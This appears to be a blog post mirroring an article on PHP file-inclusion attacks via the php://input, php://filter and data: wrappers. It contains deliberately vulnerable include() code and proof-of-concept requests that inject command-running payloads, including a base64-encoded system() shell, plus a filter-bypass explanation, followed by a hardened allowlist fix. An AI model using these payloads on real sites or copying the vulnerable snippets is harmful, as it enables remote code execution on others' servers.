Self Contained RFI in PHP
This is a direct rip from here : http://www.cr0w.ru/2009/03/self-contained-file-include-in-php-520.html It is for my own record, and can be seen as a mirror. :)
Sometimes these two tricks may be useful in RFI attacks.
1. Using the php://input wrapper
The php://input wrapper allows you to read the raw POST data (http://ru2.php.net/wrappers.php).
For example, consider the following code:
<?php
// Vulnerable: the include path is built directly from user input.
if ( include($_GET['file'] . '.php') ) {
    echo 'Henck!';
} else {
    echo 'Error!';
}
?>
For exploitation we need:
allow_url_include=On
magic_quotes_gpc=Off
PoC:
POST http://site.com/index.php?file=php://input HTTP/1.1
Host: site.com

<?php passthru('dir'); ?>
Also, using the additional php://filter wrapper (available since PHP 5.0.0), we can encode our PHP code:
POST http://site.com/index.php?file=php://filter/read=string.rot13/resource=php://input HTTP/1.1
Host: site.com

<?php passthru('dir'); ?>
2. Using the data: wrapper
Since version 5.2.0, PHP supports the "data" URL scheme (http://ru.php.net/manual/ru/wrappers.data.php).
Example code:
<?php
$file = $_GET['file'];
// Attempted filtering of directory traversal and URLs (still vulnerable:
// neither php://input nor data: needs a '.' to be usable here).
$file = str_replace('/', '', $file);
$file = str_replace('.', '', $file);
if ( include($file . '.php') ) {
    echo 'Henck!';
} else {
    echo 'Error!';
}
?>
For exploitation we need:
PHP version >= 5.2.0
allow_url_include=On
PoC:
http://site.com/index2.php?file=data:,<?php system($_GET[c]); ?>?&c=dir
It's also possible to encode this PHP code in Base64:
http://site.com/index2.php?file=data:;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NdKTsgPz4=&c=dir
These methods are interesting because the attacker doesn't need to host his PHP code on any HTTP/FTP/etc. server. The attacker can also bypass some simple filters, like the one in the second example code.
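For comparison, here is a hardened replacement for the two include snippets above. It is an added example, not code from the original post or from cr0w.ru; the page names in $ALLOWED_PAGES, the ./pages/ directory and the PHP 7.1+ syntax are assumptions. Instead of stripping characters (the second snippet's filter still lets php://input and data: through, since neither needs a '/' or a '.'), it maps the user's input onto a fixed allowlist and then checks that the resolved file really lives under the pages directory:

```php
<?php
// Added example (not from the original post): allowlist-based include.
// Assumptions: pages live in ./pages/ as <name>.php, and $ALLOWED_PAGES is
// the fixed set of page names the application actually serves.
$ALLOWED_PAGES = ['home', 'about', 'contact'];

/**
 * Resolve a user-supplied page name to an absolute path, or return null.
 * Wrapper URLs such as php://input, php://filter/... and data:,... never
 * match the allowlist, so the include is never reached for them. The
 * realpath() check is defence in depth: even if a name were added to the
 * list by mistake, the included file must still sit inside $baseDir.
 */
function resolve_page(string $name, array $allowed, string $baseDir): ?string
{
    // 1. Exact, strict allowlist match: no "clean-up" of the input at all.
    if (!in_array($name, $allowed, true)) {
        return null;
    }
    // 2. The resolved file must exist and be located under $baseDir.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$requested = isset($_GET['file']) ? (string) $_GET['file'] : 'home';
$target = resolve_page($requested, $ALLOWED_PAGES, __DIR__ . '/pages');

if ($target === null) {
    // Both PoC values from the post ("php://input", "data:,...") end up here.
    http_response_code(404);
    echo 'Error!';
    exit;
}
include $target;
echo 'Henck!';
```

Keep allow_url_include=Off (the default since PHP 5.2.0) as well; the code-level check does not depend on it, but the ini setting blocks the php://input and data: wrappers for include even in code you do not control.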
kudos to original writer, http://www.cr0w.ru
//alak